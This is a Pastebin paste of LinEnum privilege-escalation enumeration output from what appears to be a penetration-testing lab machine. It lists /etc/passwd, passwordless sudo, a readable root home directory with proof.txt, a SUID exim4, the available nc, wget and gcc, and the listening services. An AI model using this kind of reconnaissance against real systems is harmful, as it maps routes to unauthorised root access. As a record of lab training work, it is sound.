API tools faq
paste
Advertisement
Guest User

LINENUM

a guest
Aug 8th, 2018
2,375
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 58.21 KB | None | 0 0
raw download clone embed print report
  1. bob@sufferance:/tmp$ bash linenum.sh
  2.  
  3. #########################################################
  4. # Local Linux Enumeration & Privilege Escalation Script #
  5. #########################################################
  6. # www.rebootuser.com
  7. # version 0.91
  8.  
  9. [-] Debug Info
  10. [+] Thorough tests = Disabled (SUID/GUID checks will not be perfomed!)
  11.  
  12.  
  13. Scan started at:
  14. Wed Aug 8 03:55:57 EDT 2018
  15.  
  16.  
  17. ### SYSTEM ##############################################
  18. [-] Kernel information:
  19. Linux sufferance 2.6.30.5-ph33r #1 SMP Sat Aug 29 16:20:59 EDT 2009 i686 GNU/Linux
  20.  
  21.  
  22. [-] Kernel information (continued):
  23. Linux version 2.6.30.5-ph33r (root@sufference) (gcc version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)) #1 SMP Sat Aug 29 16:20:59 EDT 2009
  24.  
  25.  
  26. [-] Hostname:
  27. sufferance
  28.  
  29.  
  30. ### USER/GROUP ##########################################
  31. [-] Current user/group info:
  32. uid=1001(bob) gid=1001(bob) groups=1001(bob)
  33.  
  34.  
  35. [-] Users that have previously logged onto the system:
  36. Username Port From Latest
  37. root tty1 Thu Jun 9 07:30:24 -0400 2016
  38. bob pts/1 10.11.0.86 Wed Aug 8 03:21:49 -0400 2018
  39.  
  40.  
  41. [-] Who else is logged on:
  42. 03:55:57 up 9:27, 2 users, load average: 0.00, 0.00, 0.00
  43. USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
  44. bob pts/0 10.11.0.86 03:14 37:01m 0.00s 0.00s -bash
  45. bob pts/1 10.11.0.86 03:21 2.00s 0.03s 0.02s bash linenum.sh
  46.  
  47.  
  48. [-] Group memberships:
  49. uid=0(root) gid=0(root) groups=0(root)
  50. uid=1(daemon) gid=1(daemon) groups=1(daemon)
  51. uid=2(bin) gid=2(bin) groups=2(bin)
  52. uid=3(sys) gid=3(sys) groups=3(sys)
  53. uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
  54. uid=5(games) gid=60(games) groups=60(games)
  55. uid=6(man) gid=12(man) groups=12(man)
  56. uid=7(lp) gid=7(lp) groups=7(lp)
  57. uid=8(mail) gid=8(mail) groups=8(mail)
  58. uid=9(news) gid=9(news) groups=9(news)
  59. uid=10(uucp) gid=10(uucp) groups=10(uucp)
  60. uid=13(proxy) gid=13(proxy) groups=13(proxy)
  61. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  62. uid=34(backup) gid=34(backup) groups=34(backup)
  63. uid=38(list) gid=38(list) groups=38(list)
  64. uid=39(irc) gid=39(irc) groups=39(irc)
  65. uid=41(gnats) gid=41(gnats) groups=41(gnats)
  66. uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
  67. uid=100(Debian-exim) gid=102(Debian-exim) groups=102(Debian-exim)
  68. uid=101(statd) gid=65534(nogroup) groups=65534(nogroup)
  69. uid=102(identd) gid=65534(nogroup) groups=65534(nogroup)
  70. uid=103(sshd) gid=65534(nogroup) groups=65534(nogroup)
  71. uid=1001(bob) gid=1001(bob) groups=1001(bob)
  72.  
  73.  
  74. [-] Contents of /etc/passwd:
  75. root:x:0:0:root:/root:/bin/bash
  76. daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  77. bin:x:2:2:bin:/bin:/bin/sh
  78. sys:x:3:3:sys:/dev:/bin/sh
  79. sync:x:4:65534:sync:/bin:/bin/sync
  80. games:x:5:60:games:/usr/games:/bin/sh
  81. man:x:6:12:man:/var/cache/man:/bin/sh
  82. lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  83. mail:x:8:8:mail:/var/mail:/bin/sh
  84. news:x:9:9:news:/var/spool/news:/bin/sh
  85. uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  86. proxy:x:13:13:proxy:/bin:/bin/sh
  87. www-data:x:33:33:www-data:/var/www:/bin/sh
  88. backup:x:34:34:backup:/var/backups:/bin/sh
  89. list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  90. irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  91. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  92. nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  93. Debian-exim:x:100:102::/var/spool/exim4:/bin/false
  94. statd:x:101:65534::/var/lib/nfs:/bin/false
  95. identd:x:102:65534::/var/run/identd:/bin/false
  96. sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
  97. bob:x:1001:1001::/home/bob:/bin/bash
  98.  
  99.  
  100. [-] Super user account(s):
  101. root
  102.  
  103.  
  104. [+] We can sudo without supplying a password!
  105. usage: sudo [-HPSb] [-p prompt] [-u username|#uid]
  106. { -e file [...] | -i | -s | <command> }
  107.  
  108.  
  109. [+] We can read root's home directory!
  110. total 36K
  111. drwxr-xr-x 4 root root 4.0K 2016-06-09 07:29 .
  112. drwxr-xr-x 22 root root 4.0K 2009-08-26 05:54 ..
  113. drwx------ 2 root root 4.0K 2007-09-05 19:55 .aptitude
  114. -rw------- 1 root root 35 2016-06-09 07:30 .bash_history
  115. -rw-r--r-- 1 root root 633 2016-04-19 03:53 .bashrc
  116. -rw-r--r-- 1 root root 110 2004-11-10 11:10 .profile
  117. ---------- 1 root root 33 2015-02-27 19:33 proof.txt
  118. drwx------ 2 root root 4.0K 2011-01-29 13:07 .ssh
  119. -rw------- 1 root root 1 2016-04-19 03:52 .viminfo
  120.  
  121.  
  122. [-] Are permissions on /home directories lax:
  123. total 12K
  124. drwxr-xr-x 3 root root 4.0K 2008-10-05 19:21 .
  125. drwxr-xr-x 22 root root 4.0K 2009-08-26 05:54 ..
  126. drwxr-xr-x 4 bob 1000 4.0K 2011-01-29 13:07 bob
  127.  
  128.  
  129. [-] Root is allowed to login via SSH:
  130. PermitRootLogin yes
  131.  
  132.  
  133. ### ENVIRONMENTAL #######################################
  134. [-] Environment information:
  135. SHELL=/bin/bash
  136. TERM=xterm-256color
  137. SSH_CLIENT=10.11.0.86 44278 22
  138. SSH_TTY=/dev/pts/1
  139. USER=bob
  140. PATH=/usr/local/bin:/usr/bin:/bin:/usr/games
  141. MAIL=/var/mail/bob
  142. PWD=/tmp
  143. LANG=en_US.UTF-8
  144. HOME=/home/bob
  145. SHLVL=2
  146. LOGNAME=bob
  147. SSH_CONNECTION=10.11.0.86 44278 10.11.1.136 22
  148. _=/usr/bin/env
  149.  
  150.  
  151. [-] Path information:
  152. /usr/local/bin:/usr/bin:/bin:/usr/games
  153.  
  154.  
  155. [-] Available shells:
  156. # /etc/shells: valid login shells
  157. /bin/csh
  158. /bin/sh
  159. /usr/bin/es
  160. /usr/bin/ksh
  161. /bin/ksh
  162. /usr/bin/rc
  163. /usr/bin/tcsh
  164. /bin/tcsh
  165. /usr/bin/esh
  166. /bin/bash
  167. /bin/rbash
  168.  
  169.  
  170. [-] Current umask value:
  171. u=rwx,g=rx,o=rx
  172. 0022
  173.  
  174.  
  175. [-] Password and storage information:
  176. PASS_MAX_DAYS 99999
  177. PASS_MIN_DAYS 0
  178. PASS_WARN_AGE 7
  179.  
  180.  
  181. ### JOBS/TASKS ##########################################
  182. [-] Cron jobs:
  183. -rw-r--r-- 1 root root 724 2006-12-19 19:02 /etc/crontab
  184.  
  185. /etc/cron.d:
  186. total 12
  187. drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
  188. drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
  189. -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
  190.  
  191. /etc/cron.daily:
  192. total 56
  193. drwxr-xr-x 2 root root 4096 2008-10-07 16:41 .
  194. drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
  195. -rwxr-xr-x 1 root root 5041 2007-02-26 16:21 apt
  196. -rwxr-xr-x 1 root root 314 2007-03-14 10:11 aptitude
  197. -rwxr-xr-x 1 root root 502 2007-01-02 12:26 bsdmainutils
  198. -rwxr-xr-x 1 root root 3961 2007-01-20 04:46 exim4-base
  199. -rwxr-xr-x 1 root root 419 2006-08-06 04:12 find
  200. -rwxr-xr-x 1 root root 89 2006-04-08 18:16 logrotate
  201. -rwxr-xr-x 1 root root 946 2007-01-29 07:20 man-db
  202. -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
  203. -rwxr-xr-x 1 root root 383 2008-05-29 06:21 samba
  204. -rwxr-xr-x 1 root root 3283 2006-12-19 19:02 standard
  205. -rwxr-xr-x 1 root root 1307 2006-05-25 05:38 sysklogd
  206.  
  207. /etc/cron.hourly:
  208. total 12
  209. drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
  210. drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
  211. -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
  212.  
  213. /etc/cron.monthly:
  214. total 16
  215. drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
  216. drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
  217. -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
  218. -rwxr-xr-x 1 root root 129 2006-12-19 19:02 standard
  219.  
  220. /etc/cron.weekly:
  221. total 20
  222. drwxr-xr-x 2 root root 4096 2007-09-05 19:54 .
  223. drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
  224. -rwxr-xr-x 1 root root 520 2007-01-29 07:20 man-db
  225. -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
  226. -rwxr-xr-x 1 root root 1092 2006-05-25 05:38 sysklogd
  227.  
  228.  
  229. [-] Crontab contents:
  230. # /etc/crontab: system-wide crontab
  231. # Unlike any other crontab you don't have to run the `crontab'
  232. # command to install the new version when you edit this file
  233. # and files in /etc/cron.d. These files also have username fields,
  234. # that none of the other crontabs do.
  235.  
  236. SHELL=/bin/sh
  237. PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
  238.  
  239. # m h dom mon dow user command
  240. 17 * * * * root cd / && run-parts --report /etc/cron.hourly
  241. 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
  242. 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
  243. 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
  244. #
  245.  
  246.  
  247. ### NETWORKING ##########################################
  248. [-] Network and IP info:
  249. eth0 Link encap:Ethernet HWaddr 00:50:56:B8:8E:C5
  250. inet addr:10.11.1.136 Bcast:10.11.255.255 Mask:255.255.0.0
  251. inet6 addr: fe80::250:56ff:feb8:8ec5/64 Scope:Link
  252. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
  253. RX packets:81845 errors:2 dropped:4 overruns:0 frame:0
  254. TX packets:27849 errors:0 dropped:0 overruns:0 carrier:0
  255. collisions:0 txqueuelen:1000
  256. RX bytes:7177303 (6.8 MiB) TX bytes:4947482 (4.7 MiB)
  257. Interrupt:18 Base address:0x2000
  258.  
  259. lo Link encap:Local Loopback
  260. inet addr:127.0.0.1 Mask:255.0.0.0
  261. inet6 addr: ::1/128 Scope:Host
  262. UP LOOPBACK RUNNING MTU:16436 Metric:1
  263. RX packets:18 errors:0 dropped:0 overruns:0 frame:0
  264. TX packets:18 errors:0 dropped:0 overruns:0 carrier:0
  265. collisions:0 txqueuelen:0
  266. RX bytes:1572 (1.5 KiB) TX bytes:1572 (1.5 KiB)
  267.  
  268.  
  269. [-] Nameserver(s):
  270. nameserver 10.11.1.220
  271. nameserver 10.11.1.221
  272.  
  273.  
  274. [-] Listening TCP:
  275. Active Internet connections (servers and established)
  276. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  277. tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
  278. tcp 0 0 0.0.0.0:113 0.0.0.0:* LISTEN -
  279. tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
  280. tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
  281. tcp 0 0 10.11.1.136:445 10.11.0.60:60674 ESTABLISHED-
  282. tcp6 0 0 :::22 :::* LISTEN -
  283. tcp6 0 2396 ::ffff:10.11.1.136:22 ::ffff:10.11.0.86:44278 ESTABLISHED-
  284. tcp6 0 0 ::ffff:10.11.1.136:22 ::ffff:10.11.0.86:44154 ESTABLISHED-
  285.  
  286.  
  287. [-] Listening UDP:
  288. Active Internet connections (servers and established)
  289. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  290. udp 0 0 10.11.1.136:137 0.0.0.0:* -
  291. udp 0 0 0.0.0.0:137 0.0.0.0:* -
  292. udp 0 0 10.11.1.136:138 0.0.0.0:* -
  293. udp 0 0 0.0.0.0:138 0.0.0.0:* -
  294.  
  295.  
  296. ### SERVICES #############################################
  297. [-] Running processes:
  298. USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
  299. root 1 0.0 0.0 1940 640 ? Ss Aug07 0:01 init [2]
  300. root 2 0.0 0.0 0 0 ? S< Aug07 0:00 [kthreadd]
  301. root 3 0.0 0.0 0 0 ? S< Aug07 0:00 [migration/0]
  302. root 4 0.0 0.0 0 0 ? S< Aug07 0:00 [ksoftirqd/0]
  303. root 5 0.0 0.0 0 0 ? S< Aug07 0:00 [watchdog/0]
  304. root 6 0.0 0.0 0 0 ? S< Aug07 0:00 [events/0]
  305. root 7 0.0 0.0 0 0 ? S< Aug07 0:00 [cpuset]
  306. root 8 0.0 0.0 0 0 ? S< Aug07 0:00 [khelper]
  307. root 13 0.0 0.0 0 0 ? S< Aug07 0:00 [async/mgr]
  308. root 60 0.0 0.0 0 0 ? S< Aug07 0:00 [kblockd/0]
  309. root 62 0.0 0.0 0 0 ? S< Aug07 0:00 [kacpid]
  310. root 63 0.0 0.0 0 0 ? S< Aug07 0:00 [kacpi_notify]
  311. root 174 0.0 0.0 0 0 ? S< Aug07 0:00 [kseriod]
  312. root 224 0.0 0.0 0 0 ? S Aug07 0:00 [khungtaskd]
  313. root 225 0.0 0.0 0 0 ? S Aug07 0:00 [pdflush]
  314. root 226 0.0 0.0 0 0 ? S Aug07 0:00 [pdflush]
  315. root 227 0.0 0.0 0 0 ? S< Aug07 0:00 [kswapd0]
  316. root 228 0.0 0.0 0 0 ? S< Aug07 0:00 [aio/0]
  317. root 229 0.0 0.0 0 0 ? S< Aug07 0:00 [crypto/0]
  318. bob 705 0.2 0.3 19220 3176 ? S Aug07 1:17 /usr/lib/vmware-tools/sbin32/vmtoolsd -n vmusr
  319. bob 736 0.0 0.3 19220 3176 ? S Aug07 0:27 /usr/lib/vmware-tools/sbin32/vmtoolsd -n vmusr
  320. root 787 0.0 0.0 0 0 ? S< Aug07 0:00 [ata/0]
  321. root 809 0.0 0.0 0 0 ? S< Aug07 0:00 [ata_aux]
  322. root 810 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_0]
  323. root 811 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_1]
  324. root 954 0.0 0.0 0 0 ? S< Aug07 0:00 [mpt_poll_0]
  325. root 970 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_2]
  326. root 1183 0.0 0.2 7668 2224 ? Ss 03:14 0:00 sshd: bob [priv]
  327. bob 1185 0.0 0.1 7668 1560 ? S 03:14 0:00 sshd: bob@pts/0
  328. bob 1186 0.0 0.1 4484 1972 pts/0 Ss+ 03:14 0:00 -bash
  329. root 1194 0.0 0.2 9340 2936 ? S 03:18 0:00 /usr/sbin/smbd -D
  330. root 1201 0.0 0.0 0 0 ? S< Aug07 0:00 [kjournald]
  331. root 1482 0.0 0.0 0 0 ? S< Aug07 0:00 [kstriped]
  332. root 1485 0.0 0.0 0 0 ? S< Aug07 0:00 [ksnapd]
  333. root 1650 0.0 0.3 33948 3888 ? Sl Aug07 0:22 /usr/sbin/vmtoolsd
  334. root 1864 0.0 0.0 1620 616 ? Ss Aug07 0:00 /sbin/syslogd
  335. root 1870 0.0 0.0 1572 372 ? Ss Aug07 0:00 /sbin/klogd -x
  336. root 1923 0.0 0.2 7668 2220 ? Ss 03:21 0:00 sshd: bob [priv]
  337. root 1924 0.0 0.0 1568 560 ? Ss Aug07 0:00 /usr/sbin/acpid -c /etc/acpi/events -s /var/run/acpid.socket
  338. bob 1926 0.0 0.1 7828 1568 ? S 03:21 0:00 sshd: bob@pts/1
  339. bob 1927 0.0 0.1 4476 1924 pts/1 Ss 03:21 0:00 -bash
  340. 100 1967 0.0 0.0 5308 996 ? Ss Aug07 0:00 /usr/sbin/exim4 -bd -q30m
  341. root 1981 0.0 0.0 1744 568 ? Ss Aug07 0:00 /usr/sbin/inetd
  342. root 1988 0.0 0.1 5884 1388 ? Ss Aug07 0:01 /usr/sbin/nmbd -D
  343. root 1990 0.0 0.2 9052 2532 ? Ss Aug07 0:00 /usr/sbin/smbd -D
  344. root 1999 0.0 0.1 9052 1092 ? S Aug07 0:00 /usr/sbin/smbd -D
  345. root 2003 0.0 0.1 4920 1088 ? Ss Aug07 0:00 /usr/sbin/sshd
  346. root 2030 0.0 0.0 0 0 ? S< Aug07 0:00 [rpciod/0]
  347. root 2031 0.0 0.0 0 0 ? S< Aug07 0:00 [nfsiod]
  348. root 2037 0.0 0.0 3504 516 ? Ss Aug07 0:00 /usr/sbin/rpc.idmapd
  349. daemon 2047 0.0 0.0 1824 408 ? Ss Aug07 0:00 /usr/sbin/atd
  350. root 2054 0.0 0.0 2188 760 ? Ss Aug07 0:00 /usr/sbin/cron
  351. root 2087 0.0 0.0 1568 492 tty1 Ss+ Aug07 0:00 /sbin/getty 38400 tty1
  352. root 2088 0.0 0.0 1568 492 tty2 Ss+ Aug07 0:00 /sbin/getty 38400 tty2
  353. root 2089 0.0 0.0 1568 488 tty3 Ss+ Aug07 0:00 /sbin/getty 38400 tty3
  354. root 2090 0.0 0.0 1568 492 tty4 Ss+ Aug07 0:00 /sbin/getty 38400 tty4
  355. root 2091 0.0 0.0 1568 488 tty5 Ss+ Aug07 0:00 /sbin/getty 38400 tty5
  356. root 2092 0.0 0.0 1568 488 tty6 Ss+ Aug07 0:00 /sbin/getty 38400 tty6
  357. bob 2104 1.0 0.1 4568 1872 pts/1 S+ 03:55 0:00 bash linenum.sh
  358. bob 2105 1.0 0.1 4584 1508 pts/1 R+ 03:55 0:00 bash linenum.sh
  359. bob 2107 0.0 0.0 2744 504 pts/1 S+ 03:55 0:00 tee -a
  360. bob 2286 0.0 0.1 4584 1272 pts/1 R+ 03:55 0:00 bash linenum.sh
  361. bob 2287 0.0 0.0 3424 984 pts/1 R+ 03:55 0:00 ps aux
  362.  
  363.  
  364. [-] Process binaries and associated permissions (from above list):
  365. 16K -rwxr-xr-x 1 root root 15K 2007-02-21 12:48 /sbin/getty
  366. 24K -rwxr-xr-x 1 root root 23K 2006-05-25 05:38 /sbin/klogd
  367. 28K -rwxr-xr-x 1 root root 28K 2006-05-25 05:38 /sbin/syslogd
  368. 696K -rwxr-xr-x 2 root root 689K 2015-02-27 19:06 /usr/lib/vmware-tools/sbin32/vmtoolsd
  369. 20K -rwxr-xr-x 1 root root 18K 2006-01-15 16:24 /usr/sbin/acpid
  370. 16K -rwxr-xr-x 1 root root 16K 2006-01-03 02:15 /usr/sbin/atd
  371. 32K -rwxr-xr-x 1 root root 31K 2006-12-19 19:02 /usr/sbin/cron
  372. 676K -rwsr-xr-x 1 root root 672K 2007-01-20 04:46 /usr/sbin/exim4
  373. 32K -rwxr-xr-x 1 root root 29K 2007-03-21 14:12 /usr/sbin/inetd
  374. 900K -rwxr-xr-x 1 root root 893K 2008-05-29 06:21 /usr/sbin/nmbd
  375. 36K -rwxr-xr-x 1 root root 35K 2007-05-16 06:41 /usr/sbin/rpc.idmapd
  376. 3.1M -rwxr-xr-x 1 root root 3.1M 2008-05-29 06:21 /usr/sbin/smbd
  377. 316K -rwxr-xr-x 1 root root 312K 2007-03-05 11:38 /usr/sbin/sshd
  378. 0 lrwxrwxrwx 1 root root 37 2015-02-27 19:06 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin32/vmtoolsd
  379.  
  380.  
  381. [-] Contents of /etc/inetd.conf:
  382. # /etc/inetd.conf: see inetd(8) for further informations.
  383. #
  384. # Internet superserver configuration database
  385. #
  386. #
  387. # Lines starting with "#:LABEL:" or "#<off>#" should not
  388. # be changed unless you know what you are doing!
  389. #
  390. # If you want to disable an entry so it isn't touched during
  391. # package updates just comment it out with a single '#' character.
  392. #
  393. # Packages should modify this file by using update-inetd(8)
  394. #
  395. # <service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
  396. #
  397. #:INTERNAL: Internal services
  398. #discard stream tcp nowait root internal
  399. #discard dgram udp wait root internal
  400. #daytime stream tcp nowait root internal
  401. #time stream tcp nowait root internal
  402.  
  403. #:STANDARD: These are standard services.
  404.  
  405. #:BSD: Shell, login, exec and talk are BSD protocols.
  406.  
  407. #:MAIL: Mail, news and uucp services.
  408.  
  409. #:INFO: Info services
  410. ident stream tcp wait identd /usr/sbin/identd identd
  411.  
  412. #:BOOT: TFTP service is provided primarily for booting. Most sites
  413. # run this only on machines acting as "boot servers."
  414.  
  415. #:RPC: RPC based services
  416.  
  417. #:HAM-RADIO: amateur-radio services
  418.  
  419. #:OTHER: Other services
  420. #<off># netbios-ssn stream tcp nowait root /usr/sbin/tcpd /usr/sbin/smbd
  421.  
  422.  
  423. [-] The related inetd binary permissions:
  424. -rwxr-xr-x 1 root root 4280 2007-02-25 15:06 /usr/sbin/tcpd
  425.  
  426.  
  427. [-] /etc/init.d/ binary permissions:
  428. total 332
  429. drwxr-xr-x 2 root root 4096 2015-02-27 19:06 .
  430. drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
  431. -rwxr-xr-x 1 root root 1850 2006-01-14 06:12 acpid
  432. -rwxr-xr-x 1 root root 969 2006-01-03 02:15 atd
  433. -rwxr-xr-x 1 root root 5089 2006-09-20 07:33 bootclean
  434. -rwxr-xr-x 1 root root 2146 2006-09-12 17:30 bootlogd
  435. -rwxr-xr-x 1 root root 1915 2006-09-20 07:27 bootmisc.sh
  436. -rwxr-xr-x 1 root root 2930 2006-09-14 04:20 checkfs.sh
  437. -rwxr-xr-x 1 root root 9548 2006-09-23 03:34 checkroot.sh
  438. -rwxr-xr-x 1 root root 6110 2006-09-05 12:15 console-screen.sh
  439. -rwxr-xr-x 1 root root 1761 2006-10-12 14:55 cron
  440. -rwxr-xr-x 1 root root 7104 2007-01-18 12:45 exim4
  441. -rwxr-xr-x 1 root root 5823 2007-07-30 16:39 glibc.sh
  442. -rwxr-xr-x 1 root root 1360 2007-01-13 13:52 halt
  443. -rwxr-xr-x 1 root root 1287 2006-09-12 17:31 hostname.sh
  444. -rwxr-xr-x 1 root root 3886 2007-02-21 12:48 hwclock.sh
  445. -rwxr-xr-x 1 root root 2518 2006-09-15 14:03 ifupdown
  446. -rwxr-xr-x 1 root root 1046 2006-09-15 14:03 ifupdown-clean
  447. -rwxr-xr-x 1 root root 3484 2006-10-15 23:38 keymap.sh
  448. -rwxr-xr-x 1 root root 944 2006-09-12 17:31 killprocs
  449. -rwxr-xr-x 1 root root 1375 2006-05-25 05:38 klogd
  450. -rwxr-xr-x 1 root root 417 2006-08-08 18:38 libdevmapper1.02
  451. -rwxr-xr-x 1 root root 1054 2006-09-06 17:43 makedev
  452. -rwxr-xr-x 1 root root 1793 2006-11-14 06:12 module-init-tools
  453. -rwxr-xr-x 1 root root 617 2006-01-15 06:04 mountall-bootclean.sh
  454. -rwxr-xr-x 1 root root 1718 2006-09-12 17:30 mountall.sh
  455. -rwxr-xr-x 1 root root 2206 2006-10-03 14:22 mountdevsubfs.sh
  456. -rwxr-xr-x 1 root root 2394 2006-09-25 04:36 mountkernfs.sh
  457. -rwxr-xr-x 1 root root 615 2006-01-15 06:04 mountnfs-bootclean.sh
  458. -rwxr-xr-x 1 root root 2299 2006-11-26 08:35 mountnfs.sh
  459. -rwxr-xr-x 1 root root 3668 2006-11-26 10:13 mtab.sh
  460. -rwxr-xr-x 1 root root 1898 2007-01-16 04:06 nbd-server
  461. -rwxr-xr-x 1 root root 2550 2007-01-06 10:36 networking
  462. -rwxr-xr-x 1 root root 6644 2007-05-16 06:41 nfs-common
  463. -rwxr-xr-x 1 root root 4340 2007-05-16 06:41 nfs-kernel-server
  464. -rwxr-xr-x 1 root root 1241 2006-10-09 08:29 nfs-user-server
  465. -rwxr-xr-x 1 root root 2324 2007-02-25 15:29 openbsd-inetd
  466. -rwxr-xr-x 1 root root 1525 2006-12-22 03:15 portmap
  467. -rwxr-xr-x 1 root root 997 2006-09-12 21:42 procps.sh
  468. -rwxr-xr-x 1 root root 8045 2006-11-27 17:23 rc
  469. -rwxr-xr-x 1 root root 798 2006-09-28 13:25 rc.local
  470. -rwxr-xr-x 1 root root 480 2012-01-22 07:06 rc.py
  471. -rwxr-xr-x 1 root root 117 2005-12-02 12:44 rcS
  472. -rw-r--r-- 1 root root 1386 2006-09-13 02:10 README
  473. -rwxr-xr-x 1 root root 655 2006-09-22 10:21 reboot
  474. -rwxr-xr-x 1 root root 994 2006-09-12 17:30 rmnologin
  475. -rwxr-xr-x 1 root root 2153 2008-05-29 06:10 samba
  476. -rwxr-xr-x 1 root root 1376 2006-11-27 17:23 sendsigs
  477. -rwxr-xr-x 1 root root 585 2006-09-12 17:32 single
  478. -rw-r--r-- 1 root root 4187 2006-09-12 17:32 skeleton
  479. -rwxr-xr-x 1 root root 1891 2007-03-05 11:38 ssh
  480. -rwxr-xr-x 1 root root 520 2006-09-12 17:26 stop-bootlogd
  481. -rwxr-xr-x 1 root root 730 2006-10-02 13:14 stop-bootlogd-single
  482. -rwxr-xr-x 1 root root 541 2006-04-06 15:58 sudo
  483. -rwxr-xr-x 1 root root 2037 2006-05-25 05:38 sysklogd
  484. -rw-r--r-- 1 root root 8178 2006-12-19 05:21 udev
  485. -rw-r--r-- 1 root root 1252 2006-03-28 02:44 udev-mtab
  486. -rwxr-xr-x 1 root root 3175 2006-11-25 04:22 umountfs
  487. -rwxr-xr-x 1 root root 2128 2006-11-26 13:23 umountnfs.sh
  488. -rwxr-xr-x 1 root root 1122 2006-09-30 10:37 umountroot
  489. -rwxr-xr-x 1 root root 1815 2006-09-12 17:30 urandom
  490. -rwxr-xr-x 1 root root 41912 2015-02-27 19:06 vmware-tools
  491.  
  492.  
  493. ### SOFTWARE #############################################
  494. [-] Sudo version:
  495. Sudo version 1.6.8p12
  496.  
  497.  
  498. ### INTERESTING FILES ####################################
  499. [-] Useful file locations:
  500. /bin/nc
  501. /bin/netcat
  502. /usr/bin/wget
  503. /usr/bin/gcc
  504.  
  505.  
  506. [-] Installed compilers:
  507. ii gcc 4.1.1-15 The GNU C compiler
  508. ii gcc-4.1 4.1.1-21 The GNU C compiler
  509.  
  510.  
  511. [-] Can we read/write sensitive files:
  512. -rw-r--r-- 1 root root 945 2008-10-07 16:34 /etc/passwd
  513. -rw-r--r-- 1 root root 503 2008-10-05 19:21 /etc/group
  514. -rw-r--r-- 1 root root 475 2006-10-28 09:42 /etc/profile
  515. -rw-r----- 1 root shadow 680 2016-06-09 07:29 /etc/shadow
  516.  
  517.  
  518. [-] NFS config details:
  519. -rw-r--r-- 1 root root 1 2008-10-11 14:30 /etc/exports
  520.  
  521.  
  522. [-] Can't search *.conf files as no keyword was entered
  523.  
  524. [-] Can't search *.php files as no keyword was entered
  525.  
  526. [-] Can't search *.log files as no keyword was entered
  527.  
  528. [-] Can't search *.ini files as no keyword was entered
  529.  
  530. [-] All *.conf files in /etc (recursive 1 level):
  531. -rw-r--r-- 1 root root 1183 2008-10-07 16:41 /etc/inetd.conf
  532. -rw-r--r-- 1 root root 624 2006-07-07 22:43 /etc/mtools.conf
  533. -rw-r--r-- 1 root root 240 2007-09-05 20:01 /etc/kernel-img.conf
  534. -rw-r--r-- 1 root root 899 2006-10-29 10:27 /etc/gssapi_mech.conf
  535. -rw-r--r-- 1 root root 599 2005-09-03 08:49 /etc/logrotate.conf
  536. -rw-r--r-- 1 root root 2555 2004-12-06 08:59 /etc/reportbug.conf
  537. -rw-r--r-- 1 root root 1260 2007-02-25 14:30 /etc/ucf.conf
  538. -rw-r--r-- 1 root root 149 2007-09-05 20:29 /etc/modules.conf
  539. -rw-r--r-- 1 root root 9 2006-08-07 13:14 /etc/host.conf
  540. -rw-r--r-- 1 root root 330 2007-03-06 21:17 /etc/mke2fs.conf
  541. -rw-r--r-- 1 root root 475 2006-08-28 12:33 /etc/nsswitch.conf
  542. -rw-r--r-- 1 root root 145 2007-09-05 20:00 /etc/idmapd.conf
  543. -rw-r--r-- 1 root root 552 2004-07-31 16:34 /etc/pam.conf
  544. -rw-r--r-- 1 root root 2673 2006-12-20 14:31 /etc/debconf.conf
  545. -rw-r--r-- 1 root root 600 2007-01-19 02:25 /etc/deluser.conf
  546. -rw-r--r-- 1 root root 33 2007-09-05 19:45 /etc/ld.so.conf
  547. -rw-r--r-- 1 root root 2803 2007-09-05 19:48 /etc/adduser.conf
  548. -rw-r--r-- 1 root root 777 2006-09-12 21:53 /etc/sysctl.conf
  549. -rw-r--r-- 1 root root 1749 2006-06-21 02:43 /etc/identd.conf
  550. -rw-r--r-- 1 root root 216 2007-03-07 17:56 /etc/sestatus.conf
  551. -rw-r--r-- 1 root root 1664 2006-05-25 05:38 /etc/syslog.conf
  552. -rw-r--r-- 1 root root 807 2011-09-29 22:24 /etc/updatedb.conf
  553. -rw-r--r-- 1 root root 46 2016-04-19 03:53 /etc/resolv.conf
